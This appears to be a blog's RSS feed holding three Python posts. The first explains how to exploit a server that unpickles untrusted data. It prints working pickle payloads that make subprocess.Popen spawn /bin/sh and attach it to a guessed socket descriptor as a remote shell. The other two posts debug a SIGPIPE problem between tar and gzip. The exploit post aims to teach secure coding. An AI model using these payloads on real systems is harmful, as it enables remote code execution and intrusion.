<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs &#187; python</title>
	<atom:link href="http://blog.nelhage.com/tag/python/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 18 Aug 2011 21:57:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Exploiting misuse of Python&#8217;s &#8220;pickle&#8221;</title>
		<link>http://blog.nelhage.com/2011/03/exploiting-pickle/</link>
		<comments>http://blog.nelhage.com/2011/03/exploiting-pickle/#comments</comments>
		<pubDate>Sun, 20 Mar 2011 22:38:13 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[pickle]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[twisted]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=469</guid>
		<description><![CDATA[If you program in Python, you&#8217;re probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you&#8217;re also familiar with the warning printed prominently near the start of pickle&#8216;s documentation: Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. [...]]]></description>
			<content:encoded><![CDATA[<p>If you program in Python, you&#8217;re probably familiar with the
<a href="http://docs.python.org/library/pickle.html"><code>pickle</code></a> serialization library, which provides for efficient
binary serialization and loading of Python datatypes. <em>Hopefully</em>,
you&#8217;re also familiar with the warning printed prominently near the
start of <code>pickle</code>&#8216;s documentation:</p>

<blockquote>
  <p><em>Warning:</em> The pickle module is not intended to be secure against
  erroneous or maliciously constructed data. Never unpickle data
  received from an untrusted or unauthenticated source.</p>
</blockquote>

<p>Recently, however, I stumbled upon a project that was accepting and
unpacking untrusted pickles over the network, and a poll of some
friends revealed that few of them were aware of just how easy it is to
exploit a service that does this. As such, this blog post will
describe exactly how trivial it is to exploit such a service, using a
simplified version of the code I recently encountered as an
example. Nothing in here is novel, but it&#8217;s interesting if you haven&#8217;t
seen it.</p>

<h2>The Target</h2>

<p>The vulnerable code was a <a href="http://twistedmatrix.com/">Twisted</a> server that listened over
SSL. The code looked roughly like the following:</p>


<div class="wp_syntax"><div class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">class</span> VulnerableProtocol<span style="color: black;">&#40;</span>protocol.<span style="color: black;">Protocol</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> dataReceived<span style="color: black;">&#40;</span><span style="color: #008000;">self</span>, data<span style="color: black;">&#41;</span>:
&nbsp;
     <span style="color: #808080; font-style: italic;"># Code to actually parse incoming data according to an</span>
     <span style="color: #808080; font-style: italic;">#  internal state machine</span>
     <span style="color: #808080; font-style: italic;"># If we just finished receiving headers, call verifyAuth() to</span>
       check authentication
&nbsp;
  <span style="color: #ff7700;font-weight:bold;">def</span> verifyAuth<span style="color: black;">&#40;</span><span style="color: #008000;">self</span>, headers<span style="color: black;">&#41;</span>:
    <span style="color: #ff7700;font-weight:bold;">try</span>:
      <span style="color: #dc143c;">token</span> = <span style="color: #dc143c;">cPickle</span>.<span style="color: black;">loads</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">base64</span>.<span style="color: black;">b64decode</span><span style="color: black;">&#40;</span>headers<span style="color: black;">&#91;</span><span style="color: #483d8b;">'AuthToken'</span><span style="color: black;">&#93;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
      <span style="color: #ff7700;font-weight:bold;">if</span> <span style="color: #ff7700;font-weight:bold;">not</span> check_hmac<span style="color: black;">&#40;</span><span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'signature'</span><span style="color: black;">&#93;</span>, <span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'data'</span><span style="color: black;">&#93;</span>, getSecretKey<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>:
        <span style="color: #ff7700;font-weight:bold;">raise</span> AuthenticationFailed
      <span style="color: #008000;">self</span>.<span style="color: black;">secure_data</span> = <span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'data'</span><span style="color: black;">&#93;</span>
    <span style="color: #ff7700;font-weight:bold;">except</span>:
      <span style="color: #ff7700;font-weight:bold;">raise</span> AuthenticationFailed</pre></div></div>


<p>So, if we just send a request that looks something like:</p>

<pre><code>AuthToken: &lt;pickle here&gt;
</code></pre>

<p>The server will happily unpickle it.</p>

<h2>Executing Code</h2>

<p>So, what can we do with that? Well, <code>pickle</code> is supposed to allow us
to represent arbitrary objects. An obvious target is Python&#8217;s
<a href="http://docs.python.org/library/subprocess.html"><code>subprocess.Popen</code></a> objects &#8212; if we can trick the target
into instantiating one of those, they&#8217;ll be executing arbitrary
commands for us! To generate such a pickle, however, we can&#8217;t just
create a <code>Popen</code> object and pickle it; For various mostly-obvious
reasons, that won&#8217;t work. We could read up on the &#8220;pickle&#8221; format and
construct a stream by hand, but it turns out there is no need to.</p>

<p><code>pickle</code> allows arbitrary objects to declare how they should be
pickled by defining a <a href="http://docs.python.org/library/pickle.html#object.__reduce__"><code>__reduce__</code></a> method, which should
return either a string or a tuple describing how to reconstruct this
object on unpacking. In the simplest form, that tuple should just
contain</p>

<ul>
<li>A callable (which must be either a class, or satisfy some other,
odder, constraints), and</li>
<li>A tuple of arguments to call that callable on.</li>
</ul>

<p><code>pickle</code> will pickle each of these pieces separately, and then on
unpickling, will call the callable on the provided arguments to
construct the new object.</p>

<p>And so, we can construct a pickle that, when un-pickled, will execute
<code>/bin/sh</code>, as follows:</p>


<div class="wp_syntax"><div class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">cPickle</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">subprocess</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">base64</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">class</span> RunBinSh<span style="color: black;">&#40;</span><span style="color: #008000;">object</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> __reduce__<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: black;">&#41;</span>:
    <span style="color: #ff7700;font-weight:bold;">return</span> <span style="color: black;">&#40;</span><span style="color: #dc143c;">subprocess</span>.<span style="color: black;">Popen</span>, <span style="color: black;">&#40;</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'/bin/sh'</span>,<span style="color: black;">&#41;</span>,<span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #dc143c;">base64</span>.<span style="color: black;">b64encode</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">cPickle</span>.<span style="color: black;">dumps</span><span style="color: black;">&#40;</span>RunBinSh<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span></pre></div></div>


<h2>Getting a Remote Shell</h2>

<p>At this point, we&#8217;ve basically won. We can run arbitrary shell
commands on the target, and there are any number of ways we could
bootstrap from here up to an interactive shell and whatever else we
might want.</p>

<p>For completeness, I&#8217;ll explain what I did, since it&#8217;s a moderately
cute trick. <code>subprocess.Popen</code> lets us select which file descriptors
to attach to stdin, stdout, and stderr for the new process by passing
integers for the <code>stdin</code> and similarly-named arguments, so we can open
our <code>/bin/sh</code> on arbitrarily-numbered fd&#8217;s.</p>

<p>However, as mentioned above, the target server uses Twisted, and it
serves all requests in the same thread, using an asynchronous
event-driven model. This means we can&#8217;t necessarily predict which file
descriptor on the server will correspond to our socket, since it
depends on how many other clients are connected.</p>

<p>It also means, however, that every time we connect to the server,
we&#8217;ll open a new socket inside the same server process. So, let&#8217;s
guess that the server has fewer than, say, 20 concurrent connections
at the moment. If we connect to the server&#8217;s socket 20 times, that
will open 20 new file descriptors in the server. Since they&#8217;ll get
assigned sequentially, one of them will almost certainly be fd
20. Then, we can generate a pickle like so, and send it over:</p>


<div class="wp_syntax"><div class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">cPickle</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">subprocess</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">base64</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">class</span> Exploit<span style="color: black;">&#40;</span><span style="color: #008000;">object</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> __reduce__<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: black;">&#41;</span>:
    fd = <span style="color: #ff4500;">20</span>
    <span style="color: #ff7700;font-weight:bold;">return</span> <span style="color: black;">&#40;</span><span style="color: #dc143c;">subprocess</span>.<span style="color: black;">Popen</span>,
            <span style="color: black;">&#40;</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'/bin/sh'</span>,<span style="color: black;">&#41;</span>, <span style="color: #808080; font-style: italic;"># args</span>
             <span style="color: #ff4500;">0</span>,            <span style="color: #808080; font-style: italic;"># bufsize</span>
             <span style="color: #008000;">None</span>,         <span style="color: #808080; font-style: italic;"># executable</span>
             fd, fd, fd    <span style="color: #808080; font-style: italic;"># std{in,out,err}</span>
             <span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #dc143c;">base64</span>.<span style="color: black;">b64encode</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">cPickle</span>.<span style="color: black;">dumps</span><span style="color: black;">&#40;</span>Exploit<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span></pre></div></div>


<p>We&#8217;ll open a <code>/bin/sh</code> on fd 20, which should be one of our 20
connections, and if all goes well, we&#8217;ll see a prompt printed to one
of those. We&#8217;ll send some junk on that fd until we manage to get the
original server to error out and close the connection, and we&#8217;ll be
left talking to <code>/bin/sh</code> over a socket. Game over.</p>

<h2>In Conclusion</h2>

<p>Again, nothing here should be novel, nor would I expect any of these
pieces to take a competent hacker more than few minutes to figure out,
given the problem. But if this blog post teaches someone not to use
<code>pickle</code> on untrusted data, then it will be worth it.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/03/exploiting-pickle/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Followup to &#8220;A Very Subtle Bug&#8221;</title>
		<link>http://blog.nelhage.com/2010/03/followup-to-a-very-subtle-bug/</link>
		<comments>http://blog.nelhage.com/2010/03/followup-to-a-very-subtle-bug/#comments</comments>
		<pubDate>Wed, 03 Mar 2010 17:45:11 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[followup]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[tar]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=160</guid>
		<description><![CDATA[After my previous post got posted to reddit, there was a bunch of interesting discussion there about some details I&#8217;d handwaved over. This is a quick followup on some the investigation that various people carried out, and the conclusions they reached. In the reddit thread, lacos/lbzip2 objected that in his experiments, he didn&#8217;t see tar [...]]]></description>
			<content:encoded><![CDATA[<p>After my <a href="http://blog.nelhage.com/archives/150">previous post</a> got posted to <a href="http://www.reddit.com/r/programming/comments/b7djd/stuff_like_this_makes_me_hate_python_subtle_bugs/">reddit</a>, there was a bunch of
interesting discussion there about some details I&#8217;d handwaved
over. This is a quick followup on some the investigation that various
people carried out, and the conclusions they reached.</p>

<p>In the reddit thread, <a href="http://lacos.hu/">lacos/lbzip2</a> <a href="http://www.reddit.com/r/programming/comments/b7djd/stuff_like_this_makes_me_hate_python_subtle_bugs/c0lc0dy">objected</a> that in his
experiments, he didn&#8217;t see <code>tar</code> closing the input pipe before it was
done reading the file, and so questioned where the <code>SIGPIPE</code>/<code>EPIPE</code>
was coming from in the first place. I had actually done similar
experiments with similar results, but I was still seeing the <code>EPIPE</code>,
so I knew it could happen, but I couldn&#8217;t totally explain why.</p>

<p>A friend of mine, David Benjamin, was curious enough to source-dive
<code>tar</code>, and <a href="http://davidben.scripts.mit.edu/blog/2010/02/28/tar-filled-pipes/">posted his results</a> on his own blog. He discovered that
by default, <code>tar</code> does not close the pipe after finding all the files
it needs, because the <code>tar</code> archive format allows for later copies of
the same file, which would supercede the previous ones. This explains
why <code>lacos</code> and I saw <code>tar</code> reading to the end of a <code>linux-2.6</code>
tarball, even if we only asked for the first file.</p>

<p>He also discovered, however, that a typical tar file ends with a
number of <code>NUL</code> blocks, which <code>tar</code> treats as end-of-file. And so
<code>tar</code> will close the pipe after reading the first of these, which
opens a narrow race condition whereby tar can potentially do so before
<code>gzip</code> has written the remaining <code>NUL</code> blocks, resulting in a
<code>SIGPIPE</code>.</p>

<p>Finally, the discussion inspired <code>lacos</code> to post a <a href="http://lists.gnu.org/archive/html/help-tar/2010-03/msg00000.html">query</a> clarifying <code>tar</code>&#8216;s behavior with respect to SIGPIPE and closing the pipe early to the <code>help-tar</code>
mailing list, which resulted in a brief thread that, among other
things, revealed that the bug I posted about has been <a href="http://lists.gnu.org/archive/html/bug-tar/2009-06/msg00009.html">fixed</a> in
GNU tar as of last summer, by having <code>tar</code> reset the disposition of
<code>SIGPIPE</code> to <code>SIG_DFL</code> before spawning a child. It was also pointed out that tar checks whether a filter subprocess is killed by <code>SIGPIPE</code>, and treats that as a success &#8212; so it&#8217;s not actually necessary for a <code>tar</code> filter to handle <code>SIGPIPE</code> and exit cleanly, like <code>gzip</code> does.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/03/followup-to-a-very-subtle-bug/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>A Very Subtle Bug</title>
		<link>http://blog.nelhage.com/2010/02/a-very-subtle-bug/</link>
		<comments>http://blog.nelhage.com/2010/02/a-very-subtle-bug/#comments</comments>
		<pubDate>Sun, 28 Feb 2010 03:48:47 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[gzip]]></category>
		<category><![CDATA[pipes]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[signals]]></category>
		<category><![CDATA[tar]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=150</guid>
		<description><![CDATA[6.033, MIT&#8217;s class on computer systems, has as one of its catchphrases, &#8220;Complex systems fail for complex reasons&#8221;. As a class about designing and building complex systems, it&#8217;s a reminder that failure modes are subtle and often involve strange interactions between multiple parts of a system. In my own experience, I&#8217;ve concluded that they&#8217;re often [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://web.mit.edu/6.033/www/">6.033</a>, MIT&#8217;s class on computer systems, has as one of its
catchphrases, &#8220;Complex systems fail for complex reasons&#8221;. As a class
about designing and building complex systems, it&#8217;s a reminder that
failure modes are subtle and often involve strange interactions
between multiple parts of a system. In my own experience, I&#8217;ve
concluded that they&#8217;re often wrong. I like to say that complex systems
don&#8217;t usually fail for complex reasons, but for the <a href="http://ebroder.net/2010/01/25/complex-systems-and-simple-failures/">simplest, dumbest
possible reasons</a> &#8212; there are just more available dumb reasons. But sometimes,
complex systems do fail for complex reasons, and tracking them down
does require understanding across many of the different layers of
abstraction we&#8217;ve built up. This is a story of such a bug.</p>

<p>The following code snippet in Python is intended to extract and return
a single file from a tarball. It probably should be using
<a href="http://docs.python.org/library/tarfile.html"><code>tarfile</code></a>, but let&#8217;s ignore that for the moment.</p>

<pre><code>import subprocess
def extractFile(tarball, path):
  p = subprocess.Popen(['tar', '-xzOf', tarball, path],
                       stdout=subprocess.PIPE,
                       stderr=subprocess.PIPE)
  contents, err = p.communicate()
  if p.returncode:
    raise SomethingWentWrong(err)
  return contents
</code></pre>

<p>This code has a bug. It will often work just fine, but occasionally it
will fail, with &#8216;err&#8217; containing a message including <code>gzip: stdout:
Broken pipe</code>. If, however you were to write the equivalent code in a
shell script:</p>

<pre><code> contents="$(tar -xzOf "$tarball" "$path")"
</code></pre>

<p>you would find that it never fails in this way. So what&#8217;s going on?</p>

<p>When we launch <code>tar</code> with the <code>-z</code> option, it creates a <code>pipe(7)</code> and
forks off a <code>gzip</code> process writing into one end of the pipe. It then
reads the uncompressed tarball from the other end of the pipe, parsing
our <code>tar</code> headers, until eventually it&#8217;s done, and it closes the read
end of the pipe.</p>

<p>Since we&#8217;ve given <code>tar</code> a specific path to extract, it doesn&#8217;t need to
read the entire tarball &#8212; only up until it can find that file. So it
may close the pipe before reading the entire file, and,
correspondingly, before <code>gzip</code> is done writing to it. As explained in
<code>pipe(7)</code>:</p>

<blockquote>
If all file descriptors referring to the read end of a pipe have been
closed, then a write(2) will cause a SIGPIPE signal to be generated
for the calling process.  If the calling process is ignoring this
signal, then write(2) fails with the error EPIPE.
</blockquote>

<p>Under normal circumstances, <code>gzip</code> expects that whoever is downstream
of it may only care about a prefix of the uncompressed stream, and so
it registers a <code>SIGPIPE</code> handler which exits cleanly.</p>

<p>Python, however, doesn&#8217;t want to get <code>SIGPIPE</code>s. Instead, Python would
rather just check the return value of every <code>write</code> call it makes, and
raise an <code>IOError</code> if necessary, so that Python code gets the error in
an appropriately Pythonic way, instead of through an asynchronous
signal. And so, at startup, Python uses <code>signal(2)</code> or <code>sigaction(2)</code>
to ignore <code>SIGPIPE</code> by setting it to <code>SIG_IGN</code>.</p>

<p>As explained in <code>sigaction(2)</code>:
<blockquote>
A child created via fork(2) inherits a copy of its parent&#8217;s signal dispositions.   During  an  execve(2),  the  dispositions of handled signals are reset to the default; the dispositions of ignored signals are left unchanged.
</blockquote></p>

<p>And so, when started from Python, <code>gzip</code> starts up with
<code>SIGPIPE</code> ignored. And, for reasons I don&#8217;t understand, rather than
unconditionally handling <code>SIGPIPE</code>, <code>gzip</code> first checks whether or
not it&#8217;s ignored, and only installs a handler if the signal is not
being ignored.</p>

<p>And so, <code>SIGPIPE</code> continues to be ignored, which means that <code>gzip</code>&#8216;s
<code>write(2)</code> returns <code>EPIPE</code>, which gzip sees is nonzero, calls <code>perror</code>
on, and then exits. tar&#8217;s <code>wait</code> then sees <code>gzip</code> exit uncleanly,
which causes tar itself to exit uncleanly, which Python then raises as
an exception.</p>

<p>There&#8217;s an easy workaround, which is to re-enable SIGPIPE in the
<code>subprocess</code> child:</p>

<pre><code>  p = subprocess.Popen(['tar', '-xzOf', tarball, path],
                       stdout=subprocess.PIPE,
                       stderr=subprocess.PIPE,
                       preexec_fn=lambda:
                        signal.signal(signal.SIGPIPE, signal.SIG_DFL))
</code></pre>

<p>But who would think of doing that, without first having seen this
horribly subtle chain of bug, and having to track down what went
wrong?</p>

<p>(Here&#8217;s the <a href="http://bugs.python.org/issue1652">Python bug report</a>, and many thanks to cjwatson for
posting his discovery of this class of bug on his <a href="http://www.chiark.greenend.org.uk/ucgi/~cjwatson/blosxom/2009-07-02-python-sigpipe.html">blog</a>, which
greatly reduced the amount of time I would have had to spend tracking
this down)</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/02/a-very-subtle-bug/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>

